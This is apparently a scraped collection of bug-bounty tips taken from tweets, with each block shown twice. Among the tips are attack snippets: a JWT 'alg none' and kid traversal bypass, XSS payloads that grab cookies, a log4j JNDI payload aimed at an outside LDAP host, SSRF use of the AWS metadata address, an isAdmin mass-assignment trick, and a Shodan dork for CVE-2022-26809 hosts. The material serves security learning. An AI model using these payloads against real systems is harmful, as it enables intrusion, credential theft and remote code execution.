A burp suite extension that enumerates infrastructure and application admin interfaces (OTG-CONFIG-005) - GitHub - moeinfatehi/Admin-Panel_Finder: A burp suite extension that enumerates infrastruct...
#BugBountyTips of the Day
During @Hacker0x01 Ambassador Worldcup We (me, @rotembar and @realgam3) found DOM Based XSS that affected 6.5m+ Elementor websites, leading to 1 click WordPress panel takeover. Full writeup on Rotem's blog -> https://t.co/AfMwENptlt #BugBounty #BugBountyTips
---
When a random stranger I gifted my #bugbounty course to comes back a couple of months later to pay back.. I'm humbly proud. Keep shining 🌟 https://t.co/p5G0vhDko6 https://t.co/nPazn55ean
---
Ways to bypass JSON Web Token controls:✅Tip1 ▶️The header part: { "alg" : "HS256", "typ" : "JWT" } ▶️Bypass::> Simple Temper the algorithm type: { "alg" : "none", "typ" : "JWT" } { "user" : "admin" } #bugbountytips #infosec #infosecurity #appsec
---
#Learnwithxssmice Top Burp Suite Extensions For Improving Bug Bounty 1. AUTHMATRIX 2. AUTHZ 3. AUTHORIZE 4. BLACKSLASH POWERED SCANNER 5. COLLABORATOR EVERYWHERE @theXSSrat @ADITYASHENDE17 @Agarri_FR @ghostlulz1337 @j33n1k4 @rbhichher #bugbounty #pentest Thread Continues
---
Best ever Tools 🔧 for Bug Bounty Hunters... via@Lohitaksh @ADITYASHENDE17 @Assass1nmarcos @Alra3ees #infosec #bugbounty #bugbountytips #xss https://t.co/bzGXfuie0g
---
Top story: @kakarstoreshop: 'Skills of #sciencetwitter #Cloud #MachineLearning #python #IoT #100DaysOfCode #programming #CodeNewbie #reactjs #bugbounty #DataScience #gamedev #BigData #Analytics #NeuralNetworks #Comput… https://t.co/kdy3APvGoI, see more https://t.co/CYJi5BLBS8
---
How to find SQL Injection at scale? Try this 👇 #recontips #AttackSurface #bugbountytips #reconone #BugBounty #sqlmap https://t.co/Ickwvh0Cz9
---
Digital Forensics and Incident Response Cheat Sheet Credit: @sansforensics #infosec #cybersecurity #pentesting #oscp #informationsecurity #DataSecurity #CyberSec #Hackers #tools #bugbountytips #Linux #websecurity #Network #NetworkSecurity #cybersecurityawareness https://t.co/Wa0QJdMspq
---
#bugbountytip So many bug hunters use RXSS scanners on WayBack data blindly. But All Wayback data response MIME type is not HTML, right? Filter out HTML MIME type and run your scanner or look for reflected param then XSS manually. This is how you will save a lot of time :) https://t.co/f4otFkpJ3v
During @Hacker0x01 Ambassador Worldcup We (me, @rotembar and @realgam3) found DOM Based XSS that affected 6.5m+ Elementor websites, leading to 1 click WordPress panel takeover. Full writeup on Rotem's blog -> https://t.co/AfMwENptlt #BugBounty #BugBountyTips
---
When a random stranger I gifted my #bugbounty course to comes back a couple of months later to pay back.. I'm humbly proud. Keep shining 🌟 https://t.co/p5G0vhDko6 https://t.co/nPazn55ean
---
Ways to bypass JSON Web Token controls:✅Tip1 ▶️The header part: { "alg" : "HS256", "typ" : "JWT" } ▶️Bypass::> Simple Temper the algorithm type: { "alg" : "none", "typ" : "JWT" } { "user" : "admin" } #bugbountytips #infosec #infosecurity #appsec
---
#Learnwithxssmice Top Burp Suite Extensions For Improving Bug Bounty 1. AUTHMATRIX 2. AUTHZ 3. AUTHORIZE 4. BLACKSLASH POWERED SCANNER 5. COLLABORATOR EVERYWHERE @theXSSrat @ADITYASHENDE17 @Agarri_FR @ghostlulz1337 @j33n1k4 @rbhichher #bugbounty #pentest Thread Continues
---
Best ever Tools 🔧 for Bug Bounty Hunters... via@Lohitaksh @ADITYASHENDE17 @Assass1nmarcos @Alra3ees #infosec #bugbounty #bugbountytips #xss https://t.co/bzGXfuie0g
---
Top story: @kakarstoreshop: 'Skills of #sciencetwitter #Cloud #MachineLearning #python #IoT #100DaysOfCode #programming #CodeNewbie #reactjs #bugbounty #DataScience #gamedev #BigData #Analytics #NeuralNetworks #Comput… https://t.co/kdy3APvGoI, see more https://t.co/CYJi5BLBS8
---
How to find SQL Injection at scale? Try this 👇 #recontips #AttackSurface #bugbountytips #reconone #BugBounty #sqlmap https://t.co/Ickwvh0Cz9
---
Digital Forensics and Incident Response Cheat Sheet Credit: @sansforensics #infosec #cybersecurity #pentesting #oscp #informationsecurity #DataSecurity #CyberSec #Hackers #tools #bugbountytips #Linux #websecurity #Network #NetworkSecurity #cybersecurityawareness https://t.co/Wa0QJdMspq
---
#bugbountytip So many bug hunters use RXSS scanners on WayBack data blindly. But All Wayback data response MIME type is not HTML, right? Filter out HTML MIME type and run your scanner or look for reflected param then XSS manually. This is how you will save a lot of time :) https://t.co/f4otFkpJ3v
My Publications
Hacking 6.5+ million websites => CVE-2022-29455 (Elementor)
Please upgrade your Elementor websites
#BugBountyTips of the Day
2FA Bypass Testing ( Method 12 ) ==> #WayToInject => Try To Use SOAP Endpoint To Bypass 2FA. #CipherEra #VedixEra #AlphaEraX #bugbounty #bugbountytips #redteam #offensivesecurity #cybersecuritytips #cybersecurity https://t.co/cMCiLKm0tg
---
$5000 bounty Today is different, I’m the GOAT of this game #bugbounty @Bugcrowd https://t.co/2dgbsqs9d5
---
MSRC took over 4 months to fix the root cause, and awarded this issue a $60,000 #BugBounty. So… What were the key mistakes? (9/11)
---
Normal Localhost for most server lives at 127.0.0.1 but if you find AWS Ec2 Instance and want to try #SSRF then try 169.254.169.254 because this is AWS Localhost. Normal Server: 127.0.0.1 AWS EC2 Instance:169.254.169.254 #bugbountytips #aws #cybersecurity
---
I create a custom nuclei template for mass hunting recent CVE-2022-29455(XSS) #bugbounty #nuclei https://t.co/uMC9ldy3CJ
2FA Bypass Testing ( Method 12 ) ==> #WayToInject => Try To Use SOAP Endpoint To Bypass 2FA. #CipherEra #VedixEra #AlphaEraX #bugbounty #bugbountytips #redteam #offensivesecurity #cybersecuritytips #cybersecurity https://t.co/cMCiLKm0tg
---
$5000 bounty Today is different, I’m the GOAT of this game #bugbounty @Bugcrowd https://t.co/2dgbsqs9d5
---
MSRC took over 4 months to fix the root cause, and awarded this issue a $60,000 #BugBounty. So… What were the key mistakes? (9/11)
---
Normal Localhost for most server lives at 127.0.0.1 but if you find AWS Ec2 Instance and want to try #SSRF then try 169.254.169.254 because this is AWS Localhost. Normal Server: 127.0.0.1 AWS EC2 Instance:169.254.169.254 #bugbountytips #aws #cybersecurity
---
I create a custom nuclei template for mass hunting recent CVE-2022-29455(XSS) #bugbounty #nuclei https://t.co/uMC9ldy3CJ
Twitter
Deepak Choudhary
2FA Bypass Testing ( Method 12 ) ==> #WayToInject => Try To Use SOAP Endpoint To Bypass 2FA. #CipherEra #VedixEra #AlphaEraX #bugbounty #bugbountytips #redteam #offensivesecurity #cybersecuritytips #cybersecurity
#BugBountyTips of the Day
Yay, I was awarded a $1,300 bounty on @Hacker0x01! , for missing rate limit at login page 🥳 #bugbountytips #BugBounty #hackers #hackerone https://t.co/573zhTBDV8 #TogetherWeHitHarder https://t.co/BgsjJAU85h
---
Ways to bypass JSON Web Token controls:✅Tip2 ▶️KID manipulation: { "alg" : "HS256", "typ" : "JWT" "kid" : "1" } If field is controlled by the user, it can be manipulated by attackers to lead: ▶️Directory traversal: “kid”: “../../etc/groups” #bugbountytips #infosecurity
---
Bug: RXSS #xss #bugbounty payload: %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E payload: %22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E https://t.co/fwXZQOWKCT
---
New video on the #bugbounty hunting process that helped me go from $0 to $150,000/mo on #bugcrowd! I believe if you follow these (5) steps it will help those struggling to find valid #cybersecurity bugs. I focus on #hacking #infosecurity. ❤️☝️ https://t.co/SaEvg28Sen
---
Basic Linux Commands Credit: @securitygull #infosec #cybersecurity #pentesting #oscp #informationsecurity #hacking #cissp #redteam #technology #DataSecurity #CyberSec #Hackers #tools #bugbountytips #Linux #websecurity #Network #NetworkSecurity #cybersecurityawareness https://t.co/syaZrv5lxs
---
A quick SSRF Bypass Explanation: Type in http://2130706433 instead of http://127.0.0.1, it would still be understood! Replace: 127.0.0.1 with 2130706433 Explanation Continued in Thread👇 #bugbountytips #ssrf #infosec #bughunting
---
Hi community! YokaiSwap Godwoken V1.1 testnet online now👹⚡️ Let's go test and find the bug🐞! 💫Together we create a secure environment for everyone💫 🧐Details: https://t.co/CcdLaOOsHF #bugbounty #Godwoken $YOK
Yay, I was awarded a $1,300 bounty on @Hacker0x01! , for missing rate limit at login page 🥳 #bugbountytips #BugBounty #hackers #hackerone https://t.co/573zhTBDV8 #TogetherWeHitHarder https://t.co/BgsjJAU85h
---
Ways to bypass JSON Web Token controls:✅Tip2 ▶️KID manipulation: { "alg" : "HS256", "typ" : "JWT" "kid" : "1" } If field is controlled by the user, it can be manipulated by attackers to lead: ▶️Directory traversal: “kid”: “../../etc/groups” #bugbountytips #infosecurity
---
Bug: RXSS #xss #bugbounty payload: %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E payload: %22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E https://t.co/fwXZQOWKCT
---
New video on the #bugbounty hunting process that helped me go from $0 to $150,000/mo on #bugcrowd! I believe if you follow these (5) steps it will help those struggling to find valid #cybersecurity bugs. I focus on #hacking #infosecurity. ❤️☝️ https://t.co/SaEvg28Sen
---
Basic Linux Commands Credit: @securitygull #infosec #cybersecurity #pentesting #oscp #informationsecurity #hacking #cissp #redteam #technology #DataSecurity #CyberSec #Hackers #tools #bugbountytips #Linux #websecurity #Network #NetworkSecurity #cybersecurityawareness https://t.co/syaZrv5lxs
---
A quick SSRF Bypass Explanation: Type in http://2130706433 instead of http://127.0.0.1, it would still be understood! Replace: 127.0.0.1 with 2130706433 Explanation Continued in Thread👇 #bugbountytips #ssrf #infosec #bughunting
---
Hi community! YokaiSwap Godwoken V1.1 testnet online now👹⚡️ Let's go test and find the bug🐞! 💫Together we create a secure environment for everyone💫 🧐Details: https://t.co/CcdLaOOsHF #bugbounty #Godwoken $YOK
HackerOne
HackerOne profile - kassem_s94
hacker at night , 🌵 eBay HOF -
#BugBountyTips of the Day
Here is a writeup about a vulnerability and bypass i found in Meta's bug bounty program worth 10K USD. #bugbounty #facebookwhitehat https://t.co/rZsjL46cAR
---
Just published new writeup, you can find it here: #bugbounty #bugbountytips #CVE https://t.co/OeBRRYIxf6
---
Do you want to focus on "Interesting" subdomains only? Try this 👇 #recontips #bugbountytips #recon #AttackSurface #subdomains #reconone https://t.co/si7881nCAS
---
Start reading security articles/write ups of topic you don’t know , you will never get 95% of what the article is explaining but the other 5% stays in your mind and help you later when you are on the edge of exploiting p1 bug. Try it, this works. #infosec #bugbountytips #advice
---
How to approach a BUG HUNTING TARGET? (Fast and Furious Technique) #bugbountytips #spinthehack #infosec https://t.co/tpoBO1Jkyu
---
API Bug-Bounty Tools Checklist (Part-2) -> Astra -> crAPI -> Curity Identity Server (Community Edition) -> JWT_io -> OAuth Tools -> HAWK Authentication #bugbounty #bugbountytip #cybersecurity #cybersecuritytips #TweetOfTheDay #offensivesecurity #100daysofbugbounty #DEFCON30
Here is a writeup about a vulnerability and bypass i found in Meta's bug bounty program worth 10K USD. #bugbounty #facebookwhitehat https://t.co/rZsjL46cAR
---
Just published new writeup, you can find it here: #bugbounty #bugbountytips #CVE https://t.co/OeBRRYIxf6
---
Do you want to focus on "Interesting" subdomains only? Try this 👇 #recontips #bugbountytips #recon #AttackSurface #subdomains #reconone https://t.co/si7881nCAS
---
Start reading security articles/write ups of topic you don’t know , you will never get 95% of what the article is explaining but the other 5% stays in your mind and help you later when you are on the edge of exploiting p1 bug. Try it, this works. #infosec #bugbountytips #advice
---
How to approach a BUG HUNTING TARGET? (Fast and Furious Technique) #bugbountytips #spinthehack #infosec https://t.co/tpoBO1Jkyu
---
API Bug-Bounty Tools Checklist (Part-2) -> Astra -> crAPI -> Curity Identity Server (Community Edition) -> JWT_io -> OAuth Tools -> HAWK Authentication #bugbounty #bugbountytip #cybersecurity #cybersecuritytips #TweetOfTheDay #offensivesecurity #100daysofbugbounty #DEFCON30
Medium
Messenger leaking victim’s video though victim gets popup/whole screen UI saying his video isn’t being shared.
After finding a few technical bugs on fb program, i was looking in new programs and then I read about how Facetime had leaked audio if you…
#BugBountyTips of the Day
Wanna find bugs before anyone else? #bugbountytip #bugbounty 1. Let's say you have scope,text 2. You run your tools to find domains and save them to subs,text Everyday when you go to sleep run cat scope,txt | domain tools | anew subs,txt | tee -a newly-appear-doman,txt 1/2
---
Scavenger - Burp extension to create target-specific and tailored wordlist from burp history. » https://t.co/FEdtP1fCWh #cybersecurity #infosec #bugbountytips https://t.co/lZ3tUW8FUY
Wanna find bugs before anyone else? #bugbountytip #bugbounty 1. Let's say you have scope,text 2. You run your tools to find domains and save them to subs,text Everyday when you go to sleep run cat scope,txt | domain tools | anew subs,txt | tee -a newly-appear-doman,txt 1/2
---
Scavenger - Burp extension to create target-specific and tailored wordlist from burp history. » https://t.co/FEdtP1fCWh #cybersecurity #infosec #bugbountytips https://t.co/lZ3tUW8FUY
GitHub
GitHub - 0xDexter0us/Scavenger: Burp extension to create target specific and tailored wordlist from burp history.
Burp extension to create target specific and tailored wordlist from burp history. - GitHub - 0xDexter0us/Scavenger: Burp extension to create target specific and tailored wordlist from burp history.
#BugBountyTips of the Day
🧨 Windows RPC Critical Vulnerability (CVE-2022-26809) You can search for vulnerable hosts in Shodan by dorks: port:445 product:"Microsoft RPC Endpoint Mapper" Link to PoC https://t.co/AXQC2W0rmU #bugbountytips #CVE #cybersecurity #infosec #bugbounty https://t.co/r7uf5eWgji
---
(WEF - 802.11 Offensive Framework To Automate Attacks for WPA, WEP, Hash Cracking, Bluetooth Hacking & More) - https://t.co/dwhlbrYK9H #infosec #netsec #pentest #cybersecurity #bugbounty https://t.co/nlSnMICPaf
---
New RCE log4j with @GodfatherOrwa Paylaod : ${jndi:ldap://${Command}XXXX${::-.} https://t.co/CSf4toAzvx}zzzz Command sys:os.arch & sys:os.version & hostName #bugbountytips #bugbountytip #bugbounty
---
toxssin☣️A POST-XSS exploitation tool. » https://t.co/MnYBAafnon #cybersecurity #bugbounty #infosec #bugbountytips #xss https://t.co/MFUCvuQq2X
---
16 Search Engines for Pentester and Security Professionals 👇💣 Credits: @NandanLohitaksh #searchengine #attacksurface #recontips #bugbountytips #reconone https://t.co/A6tUqpT9VH
---
Found a Method by which I Got Some Database Credentials leaks Recently "Quick Tips" Or "writeups" #bugbounty #cybersecurity #Hackingtime https://t.co/atRsBJY7z0
---
Hello #BugBounty community, this is my first writeup about account take over hope you like #infosecurity #bugbountytips https://t.co/O5hUBbuSah
---
Today it's been 4 years working on @Bugcrowd . I have so many great memories with @Bugcrowd, I remember my first bounty there, The first time I could change my Laptop, and remember when I could spend my summer in a new country, remember when I bought my first car. #BugBounty
---
Nmap reconnaissance for the win 🔥🔥🔥 nmap --script default,safe,discovery -p 80,443,8080,8443,9000,9001,9002,9003,8888,8088,8880,3000 -n -T4 -iL hosts.txt -oN output #bugbountytips #bugbountytip #bugbounty
🧨 Windows RPC Critical Vulnerability (CVE-2022-26809) You can search for vulnerable hosts in Shodan by dorks: port:445 product:"Microsoft RPC Endpoint Mapper" Link to PoC https://t.co/AXQC2W0rmU #bugbountytips #CVE #cybersecurity #infosec #bugbounty https://t.co/r7uf5eWgji
---
(WEF - 802.11 Offensive Framework To Automate Attacks for WPA, WEP, Hash Cracking, Bluetooth Hacking & More) - https://t.co/dwhlbrYK9H #infosec #netsec #pentest #cybersecurity #bugbounty https://t.co/nlSnMICPaf
---
New RCE log4j with @GodfatherOrwa Paylaod : ${jndi:ldap://${Command}XXXX${::-.} https://t.co/CSf4toAzvx}zzzz Command sys:os.arch & sys:os.version & hostName #bugbountytips #bugbountytip #bugbounty
---
toxssin☣️A POST-XSS exploitation tool. » https://t.co/MnYBAafnon #cybersecurity #bugbounty #infosec #bugbountytips #xss https://t.co/MFUCvuQq2X
---
16 Search Engines for Pentester and Security Professionals 👇💣 Credits: @NandanLohitaksh #searchengine #attacksurface #recontips #bugbountytips #reconone https://t.co/A6tUqpT9VH
---
Found a Method by which I Got Some Database Credentials leaks Recently "Quick Tips" Or "writeups" #bugbounty #cybersecurity #Hackingtime https://t.co/atRsBJY7z0
---
Hello #BugBounty community, this is my first writeup about account take over hope you like #infosecurity #bugbountytips https://t.co/O5hUBbuSah
---
Today it's been 4 years working on @Bugcrowd . I have so many great memories with @Bugcrowd, I remember my first bounty there, The first time I could change my Laptop, and remember when I could spend my summer in a new country, remember when I bought my first car. #BugBounty
---
Nmap reconnaissance for the win 🔥🔥🔥 nmap --script default,safe,discovery -p 80,443,8080,8443,9000,9001,9002,9003,8888,8088,8880,3000 -n -T4 -iL hosts.txt -oN output #bugbountytips #bugbountytip #bugbounty
GitHub
GitHub - s1ckb017/PoC-CVE-2022-26809: PoC for CVE-2022-26809, analisys and considerations are shown in the github.io.
PoC for CVE-2022-26809, analisys and considerations are shown in the github.io. - GitHub - s1ckb017/PoC-CVE-2022-26809: PoC for CVE-2022-26809, analisys and considerations are shown in the github.io.
#BugBountyTips of the Day
(Uncover -Quickly discover exposed hosts on the internet using multiple search engines.) - https://t.co/XtwiJFvb6i #infosec #netsec #pentest #cybersecurity #bugbounty https://t.co/F5y0xgD00X
---
Recon Tools for Web Application Pentesting... :) Credits ~ Khalid Maina A Thread 🧵 ↓ #cybersecurity #infosec #pentesting #bugbounty
---
Do you need to scan open ports passively? naabu, a fast #CLI #tool, searches the target on @shodanhq 's Internetdb in passive mode. https://t.co/xKk1Exk1aM @pdiscoveryio #OSINT #Shodan #bugbounty #passivescan #reconnaissance #infosec #cybersecurity https://t.co/J83dtNs81j
---
Mass Account Takeovers using HTTP Request Smuggling 👻 #bugbountytips 🧵👇🏻
---
Best of Nmap Cheat Sheet Credit: @mohamedmaly #infosec #cybersecurity #pentesting #oscp #informationsecurity #hacking #cissp #redteam #technology #DataSecurity #CyberSec #Hackers #tools #bugbountytips #Linux #websecurity #Network #NetworkSecurity https://t.co/kT5N7fSeXm
(Uncover -Quickly discover exposed hosts on the internet using multiple search engines.) - https://t.co/XtwiJFvb6i #infosec #netsec #pentest #cybersecurity #bugbounty https://t.co/F5y0xgD00X
---
Recon Tools for Web Application Pentesting... :) Credits ~ Khalid Maina A Thread 🧵 ↓ #cybersecurity #infosec #pentesting #bugbounty
---
Do you need to scan open ports passively? naabu, a fast #CLI #tool, searches the target on @shodanhq 's Internetdb in passive mode. https://t.co/xKk1Exk1aM @pdiscoveryio #OSINT #Shodan #bugbounty #passivescan #reconnaissance #infosec #cybersecurity https://t.co/J83dtNs81j
---
Mass Account Takeovers using HTTP Request Smuggling 👻 #bugbountytips 🧵👇🏻
---
Best of Nmap Cheat Sheet Credit: @mohamedmaly #infosec #cybersecurity #pentesting #oscp #informationsecurity #hacking #cissp #redteam #technology #DataSecurity #CyberSec #Hackers #tools #bugbountytips #Linux #websecurity #Network #NetworkSecurity https://t.co/kT5N7fSeXm
#BugBountyTips of the Day
Hacking Checklist ✅ - - #infosec #CyberSecurity #bugbountytips #CTF https://t.co/uxfEjnFTtj
---
I earned $800 for my submission on @bugcrowd #ItTakesACrowd Tips: 1) Used Gau To Get All The URLS 2) Used grep = Filtered Only URLS with Parameter 3) Used KXSS Got Reflection Allowing " < > ' 5) Tested XSS 6) Boom! #bugbounty #bugbountytip https://t.co/TsuhIftgbL
---
I earned $1800 for my submission on @bugcrowd #ItTakesACrowd #BugBounty https://t.co/98B2qRLWuL
---
Url redirection bypass I will try... #bugbounty https://x. site. com/bing.com (404) https://x. site. com///bing.com/? (404 not found) finally--> https://x. site. com/bing.com/?q (success):) #urlredirection
---
#bugbountytips #bugbounty I just published Java Application -Server Side Template Injection #Java #RCE More.. https://t.co/3ieYPIFHxn https://t.co/OOQKNQQCSW
---
This is my quick nmap setup, to scan critical ports at fast rate 💪🏻🔥 #portscan #attacksurface #recontips #bugbountytips #recon #nmap https://t.co/M9VRPLFFdr
---
New Write-up on InfoSec Write-ups publication : "Google Dorks: An Advanced Hacking Tool" #bugbounty #bugbountywriteup #bugbountytips https://t.co/eQJkI4zMH5
---
Mass assignment vulnerability in 1 step: ✅ ▶️ Intercept the request while login: { "name":"test”,”email":"test@abc.com","password”:"testing” } ▶️Modify the request above request like: { “name”:"test”,"email”:"test@abc.com”,"password”:"testing”,isAdmin”:true } #bugbounty #infosec
---
[story of September 2021] #bugbounty #bugbountytip This is how I found 40 open redirection in 2 weeks. Bugcrowd accept open redirect as P4🧵 1. I collected all *,main domains 2. Used passive subdomain finding tools to find domains 1/n
---
(1/2) A tool for collecting subdomains and searching for vulnerabilities https://t.co/EUcGAF7CYf #cybersecurity #bugbounty #bugbountytips #infosec #web #xss #garud #sql
Hacking Checklist ✅ - - #infosec #CyberSecurity #bugbountytips #CTF https://t.co/uxfEjnFTtj
---
I earned $800 for my submission on @bugcrowd #ItTakesACrowd Tips: 1) Used Gau To Get All The URLS 2) Used grep = Filtered Only URLS with Parameter 3) Used KXSS Got Reflection Allowing " < > ' 5) Tested XSS 6) Boom! #bugbounty #bugbountytip https://t.co/TsuhIftgbL
---
I earned $1800 for my submission on @bugcrowd #ItTakesACrowd #BugBounty https://t.co/98B2qRLWuL
---
Url redirection bypass I will try... #bugbounty https://x. site. com/bing.com (404) https://x. site. com///bing.com/? (404 not found) finally--> https://x. site. com/bing.com/?q (success):) #urlredirection
---
#bugbountytips #bugbounty I just published Java Application -Server Side Template Injection #Java #RCE More.. https://t.co/3ieYPIFHxn https://t.co/OOQKNQQCSW
---
This is my quick nmap setup, to scan critical ports at fast rate 💪🏻🔥 #portscan #attacksurface #recontips #bugbountytips #recon #nmap https://t.co/M9VRPLFFdr
---
New Write-up on InfoSec Write-ups publication : "Google Dorks: An Advanced Hacking Tool" #bugbounty #bugbountywriteup #bugbountytips https://t.co/eQJkI4zMH5
---
Mass assignment vulnerability in 1 step: ✅ ▶️ Intercept the request while login: { "name":"test”,”email":"test@abc.com","password”:"testing” } ▶️Modify the request above request like: { “name”:"test”,"email”:"test@abc.com”,"password”:"testing”,isAdmin”:true } #bugbounty #infosec
---
[story of September 2021] #bugbounty #bugbountytip This is how I found 40 open redirection in 2 weeks. Bugcrowd accept open redirect as P4🧵 1. I collected all *,main domains 2. Used passive subdomain finding tools to find domains 1/n
---
(1/2) A tool for collecting subdomains and searching for vulnerabilities https://t.co/EUcGAF7CYf #cybersecurity #bugbounty #bugbountytips #infosec #web #xss #garud #sql